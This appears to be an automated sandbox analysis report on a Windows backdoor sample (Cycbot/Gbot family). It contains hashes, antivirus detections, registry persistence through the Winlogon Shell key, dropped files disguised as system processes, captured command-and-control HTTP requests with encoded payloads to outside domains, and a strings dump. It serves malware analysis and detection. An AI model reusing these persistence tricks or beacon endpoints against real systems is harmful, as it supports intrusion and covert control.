Analysis Date2014-11-19 12:48:04
MD5716f31ec56529b0430d643bf1334ab7e
SHA185b28d78a62dc80b813ff534c9c9193b888fde6c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 9c857010274f720c5b0f137fd24b1821 sha1: cb1ab24cb0dd62fb3154e5d12d1ff21aa2b266ac size: 110592
Section.rdata md5: 926fbe0dde2297250efdad9d7043483a sha1: cab43b1a52b703e7c2d148d36669843ee84a5aa3 size: 1024
Section.data md5: f96a3a3ac569b77717f24c039dce4bcf sha1: a100a29923ae846f36a98c7c367f3a713066aa8b size: 71680
Section.reloc md5: 2db2f2a8603d738715a9f9a1513faf7c sha1: 008b5eeb7f2276065ba6a6ea5cde6d3cbaca2b5f size: 1024
Timestamp2005-09-25 04:51:28
PEhash07292c64ac21ab2710cd931e1ca7cdc5b89fb64a
IMPhash80b0c0ca1a123c51b4690c620492bf52
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-449
AVDr. WebTrojan.DownLoader4.60349
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.SXV
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNShollandandbarrett.com
Winsock DNSyourblogresources.com
Winsock DNSonlinesearchdb.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNShollandandbarrett.com
Type: A
213.62.84.113
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSonlinesearchdb.com
Type: A
DNSyourblogresources.com
Type: A
HTTP GEThttp://hollandandbarrett.com/images/footer/account.jpg?v12=11&tq=gKZEtzyPBM8lpTk5Q0%2ByTnzl%2BWVuRSEAEEP5Imc6QzK1QbUHE85J1Oah4dje39tF05jlKMky2UpPXDotyY4U5N1%2FNSmtB7d1h2faz%2FFf8XidGymShvD8oOOmFenD30c5TiL%2FJnHqpk9EmPYfZrhoJ4r%2FpnuGiQy5Tnv9Wty7GjCu%2BEE7jzcCkzVyAWDhJ4mcosS7i3N5Z85DW4zPFw6vBnUmSTt61SCKba9izuhNsYpq2TsDJIEZp8vEoH16sIMtzX4aT72eHdbMn95%2B
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqxSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaS%2FT%2Bsqti8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 213.62.84.113:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 666f6f74   GET /images/foot
0x00000010 (00016)   65722f61 63636f75 6e742e6a 70673f76   er/account.jpg?v
0x00000020 (00032)   31323d31 31267471 3d674b5a 45747a79   12=11&tq=gKZEtzy
0x00000030 (00048)   50424d38 6c70546b 35513025 32427954   PBM8lpTk5Q0%2ByT
0x00000040 (00064)   6e7a6c25 32425756 75525345 41454550   nzl%2BWVuRSEAEEP
0x00000050 (00080)   35496d63 36517a4b 31516255 48453835   5Imc6QzK1QbUHE85
0x00000060 (00096)   4a314f61 6834646a 65333974 4630356a   J1Oah4dje39tF05j
0x00000070 (00112)   6c4b4d6b 79325570 5058446f 74795934   lKMky2UpPXDotyY4
0x00000080 (00128)   55354e31 2532464e 536d7442 37643168   U5N1%2FNSmtB7d1h
0x00000090 (00144)   3266617a 25324646 66385869 6447796d   2faz%2FFf8XidGym
0x000000a0 (00160)   53687644 386f4f4f 6d46656e 44333063   ShvD8oOOmFenD30c
0x000000b0 (00176)   3554694c 2532464a 6e487170 6b39456d   5TiL%2FJnHqpk9Em
0x000000c0 (00192)   5059665a 72686f4a 34722532 46706e75   PYfZrhoJ4r%2Fpnu
0x000000d0 (00208)   47695179 35546e76 39577479 37476a43   GiQy5Tnv9Wty7GjC
0x000000e0 (00224)   75253242 4545376a 7a63436b 7a567941   u%2BEE7jzcCkzVyA
0x000000f0 (00240)   5744684a 346d636f 73533769 334e355a   WDhJ4mcosS7i3N5Z
0x00000100 (00256)   38354457 347a5046 77367642 6e556d53   85DW4zPFw6vBnUmS
0x00000110 (00272)   54743631 53434b62 6139697a 75684e73   Tt61SCKba9izuhNs
0x00000120 (00288)   59707132 5473444a 49455a70 3876456f   Ypq2TsDJIEZp8vEo
0x00000130 (00304)   48313673 494d747a 58346154 37326548   H16sIMtzX4aT72eH
0x00000140 (00320)   64624d6e 39352532 42204854 54502f31   dbMn95%2B HTTP/1
0x00000150 (00336)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000160 (00352)   636c6f73 650d0a48 6f73743a 20686f6c   close..Host: hol
0x00000170 (00368)   6c616e64 616e6462 61727265 74742e63   landandbarrett.c
0x00000180 (00384)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000190 (00400)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x000001a0 (00416)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53765425   ij%2B82uYvEaSvT%
0x000000c0 (00192)   32427371 6c537225 32466525 32425635   2BsqlSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 58346154 37326548   lose....X4aT72eH
0x00000140 (00320)   64624d6e 39352532 42204854 54502f31   dbMn95%2B HTTP/1
0x00000150 (00336)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000160 (00352)   636c6f73 650d0a48 6f73743a 20686f6c   close..Host: hol
0x00000170 (00368)   6c616e64 616e6462 61727265 74742e63   landandbarrett.c
0x00000180 (00384)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000190 (00400)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x000001a0 (00416)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a616e 642e3c2f 703e0a20   se....and.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a2020 3c2f626f 64793e0a   se....  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 58346154 37326548   </html>.X4aT72eH
0x00000140 (00320)   64624d6e 39352532 42204854 54502f31   dbMn95%2B HTTP/1
0x00000150 (00336)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000160 (00352)   636c6f73 650d0a48 6f73743a 20686f6c   close..Host: hol
0x00000170 (00368)   6c616e64 616e6462 61727265 74742e63   landandbarrett.c
0x00000180 (00384)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000190 (00400)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x000001a0 (00416)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53505425   ij%2B82uYvEaSPT%
0x000000c0 (00192)   32427371 78537225 32466525 32425635   2BsqxSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384369 59764561 53253246   ij%2B8CiYvEaS%2F
0x000000c0 (00192)   54253242 73717469 3852704c 36666853   T%2Bsqti8RpL6fhS
0x000000d0 (00208)   72253246 65253242 56355a75 52672533   r%2Fe%2BV5ZuRg%3
0x000000e0 (00224)   44253344 20485454 502f312e 310d0a48   D%3D HTTP/1.1..H
0x000000f0 (00240)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000100 (00256)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000110 (00272)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000120 (00288)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000130 (00304)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000140 (00320)   0d0a4d6e 39352532 42204854 54502f31   ..Mn95%2B HTTP/1
0x00000150 (00336)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000160 (00352)   636c6f73 650d0a48 6f73743a 20686f6c   close..Host: hol
0x00000170 (00368)   6c616e64 616e6462 61727265 74742e63   landandbarrett.c
0x00000180 (00384)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000190 (00400)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x000001a0 (00416)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....


Strings
M....
..
g
^....
.0
.
.
..
.
K
jk
080904b0
1.0.0.1
1418
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
~~~~~~~~
=======
=============
>>>{{{{{{{{
>+."`,
||||||||
|||||||||
||||||||||||||||||
 `*` ^
___________
,,,,,,,,
,,,,,,,,,,,,,
;;;;;;
;;;;;;;;;
::::::
::::::&&&&
????????
.======
''''''''''''''''
"""+++
(((((((
)))))))
]]]]]]]
]]]]]]]]]]
]]]]]]]]]]]]]
$:::::::""""
******
******************
\\\\\\\\\\\\
&@@={[
00000000
0006jjjjjj
0>FFFFFFFFFFFFFFFF555
<]0$px
0w|y]n
0x%m}7{
@@\1[ 
11aaaaaa
1_-~E_
1|e09H
1|f+tU
)1njL&
2222222222
22222222222
27DI&`
@`2A~^
!2bpT*
)\2P?s
3333__
33333;;;;;;;;;tttttt
3E	00~
+3e+4U
3VETzN
3Wd~N,
4444{{
/45[bvk
(` 4]7
48	Bp^4
]4M<%"
@@#:5{
51a'VxB
5555555555
5GY,s;
~5 IU=c
5_ljZu`
5T^'T6Ue
5vZNicID
6=`=	3
6666@@
666666
66666666
  6A;m(
6eX!B?
@[6jaN
\7+.`@
71B>*`
7777777
777777733333333333
7c|O~m
[7f7XkE&
7`qC&  
,,,,888888888888||
8888888888888
 8d4e#
@`8+Fe
|~}8h	
8k>2'e
)8pnjD
|||||99999
|9=%V,
9Y$``.
a[{`( 
A2ocH99
A7U ``
aaaaaaa
AAAAAAAA
adD~^e2D
`Agl9qM
:A_ny5
a)omLR
:AP'E^
aQCh1(?
A!r @`
A'U-(` 
./+&[B
 b7EM> 
` BB  
BBBBBBB
BBBBBBBBBBB
)BbdJ4J
<BeBa#
bfo?yk6
@bgzY^
` -BsT
~bt%a9Bz
((((ccccc
CCCCCCb
/CCCCCCCCCCCCCCC
 Cd1;`
ClipCursor
:::::::::cqqq
cQQQQQQQQQQQQQ
.Cr~'E
CreatePopupMenu
)C#wdX
  c%X006qH
_~Cy8?
d3_3J:V
D9TzXV
@.data
~~~~~~~~~~~~~dd|||d
dddd+````__
dddddd
dddddddd
DestroyMenu
:djqr!
_djYo>
]DL6wD
d& @m-g
 dO<m^
^>D]ry
DuplicateHandle
E2J HMk
E* `6R
ebbbbbbbb
EEEEEE
eeeeeeCC
EEEEEEEEEE
eeeeeeeeuu
EEEEEEjjjjj
e:`H./
EKKKKKKK
[.`@en
EnumResourceNamesW
E,  sT,`
e>V$` \
eZQ5g&%
=>F7m:
>>>>>>>>fffffff
ffffffff
FFFFFFFFdpp
FFFFFFFFF555555555
FFFFFFFFFFFFFFF
F:g3Z*
Fh8tQm[
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
FktK@X
FlushInstructionCache
F@"``Q
fvUI~e
` ]]g(` 
g2)QJ5V(
g, @5nK
$  G6|
GetDesktopWindow
GetModuleFileNameW
ge{[w$#
GG*****}
GGGGGGG
GGGGGGGG
@G@!HPY
GN!|#7XNT
gP1{\C
g,^|T.
=GVs2)b
g{Y(YxNk
`@g]Zy
#:h{_%$ 
%%%%%%%%%%%h#
 /:H~'
HGGGGGGGGGGGG
}}hhhh
HHHHH|
hhhhhhhhh
HHHHHHHHHHH
HHHHHHRRRRReeesssssssssssssss
hkB+,'s
Hl:c$,L
$hNd(Pk
hUO7dQW
hwKU9b
.;hY n
hYWe @`
)HZG )2
IH2=UO
IIIIIII
IIIIIIIIIIIIII
iiiitt
IIIooooooooo
IK(p}l<)N
`i.$SM
;IT`96-
``itcN
>iXi{N
iy#bQ#
}{J"_<
`@j}0%
^j	@{*` 5<3~
JDN>5S
jF2>Lh
jjjjjj
jjjjjjjjj
JJJJJJJJJJJJxx>>>>>>>>
++jJ>z.
jN1_JAg|%'h
jn%	,kW
J{Q@vg
`k?`8R
k   AN
_kC#i\
'(-kDe
kdSZ3K
KERNEL32.dll
KK%%%%%%%%%%
kkkkk4444444444
kkkkkk
KKKKRRRRRR
k%KLw>
k;r%g>j
`@`kt;
"k_)vF0k 
#ky;'J
L2222222222222hh
l[7%qf
l(",;!84_8
{LAVGt
@`LGj(
Lh69ph
li#@z^
l=Ki, W
`l:}lH
lllll)))))))))
]llllll
llllllllllllllll
lllllllllllllllllll			
&Lr	n_
luqyh,@
lVYf+Y
.Lz3^~
LZ3Ih `
+;M:*@`
M3QXoNC
m ``4I-
MapViewOfFile
`Mb]e0
mb/^g5
ME#Zmd
!MFE>o
mH}HCn
mmm____
mmmmm;;;;;;;;;;;;;;
MMMMMMMMM
mmmmmmmmmmm
mmmmmmmmmmmmmmmmmmmmmm
mmmmmmQQQ
MN{-?N
mwI$@@ @
mYd<~=
.@ Myw9
&#n08R
N2620}
n8_d	G
NdrComplexArrayFree
N):D{s
nH%(^H
NKb^99)/>
nnn[[[
NNNNNh
>>>>>>>>>>>>NNNNNN
NNNNNNNN
nnnnnnzz
NQ'WkN
@N_RkQ
  nS:j
`nTEA(
`'ntWN
n%%%%%%Y
 @O(``	
/o0z>	
`o450x
o:5LXo
^o8,{`K
%O==]9
oAAAAA
ooooooo0
oWWWWWW
$$$$$p
PD=/qX
p`F%ch
PJlj.@@
pL#c2#
(P/l*@N
<<<PPP##
PPPPKKK
			pppppppppp
PQj:Q2
Pwz77[)T
{(P[XBG
q5/R~l
*q6pja
q)&	,97^c
Q(  IRY
 `qk4(
	!!!!!!!qqqq
QrJY*`
qrp3ep
q*@ v^=
(` ,@@r
R+21N>?v;z
r;%3,`
#>R9P2
`.rdata
rD( `W
RedrawWindow
.reloc
rf?2(F
ri* `RNL1
RjaekJ]
	rJ)+F
'rL\k`_
RPCRT4.dll
RqcP|eD 
rrrrrr
RRRRRRHHHHHHHHHHH
rrrrrrrrr
{{R\SF-
RZ1#"c
S/. `?
sDgVQeZ\1%e
SetFileShortNameW
SHELL32.dll
Shell_NotifyIconA
 ?`S#hh
sJ]4z!
Sl2tka
smn[xd
SoTW6	
sPYYrw
ssssss
sssssssss
SSSSSSSSSSSSSS
sTgJ^G2
S  @Ve
S.w{h*
S;Wn v
swQr5&
-s	]!Y
&@ SZ3
}S z8l|@]
Szq#Dm
""""""t
}|t?,`@
`t14{i
*` TBk
!This program cannot be run in DOS mode.
THZ<tqG
timeEndPeriod
tN@+T6
TrackPopupMenuEx
tSGqEKN
TTTTTT
TTTTTTTTTT
ttttttttttttt
!TVyUX
~	|U%|
U.	*4;
(`@U/B
=uIDL@u
Uk5Xu'
UnmapViewOfFile
 `UQ:0
:UR.bb
USER32
||||||||uu
uua``o
UuidCreate
UUUUUUU
UUUUUUUU	
uuuuuuuuu
uuuuuuuuuuu
Uz0{.M
uZrWaI<5
 `V{,@
 v0P!{
V46i,`
V#94O)
v`d1BX
vE6PoI
v;}`[K@$
v?kJ{t
vs2;qWLF
vv7777777777777
'Vw7U(
w'}3!\
@W76eo1
WEMB8g|
 ]W>`G
wI|2KY
WINMM.dll
wl0Ol2,
wppQ	\c`
w	(PuE'
wUK/5j
WW0a9rbS
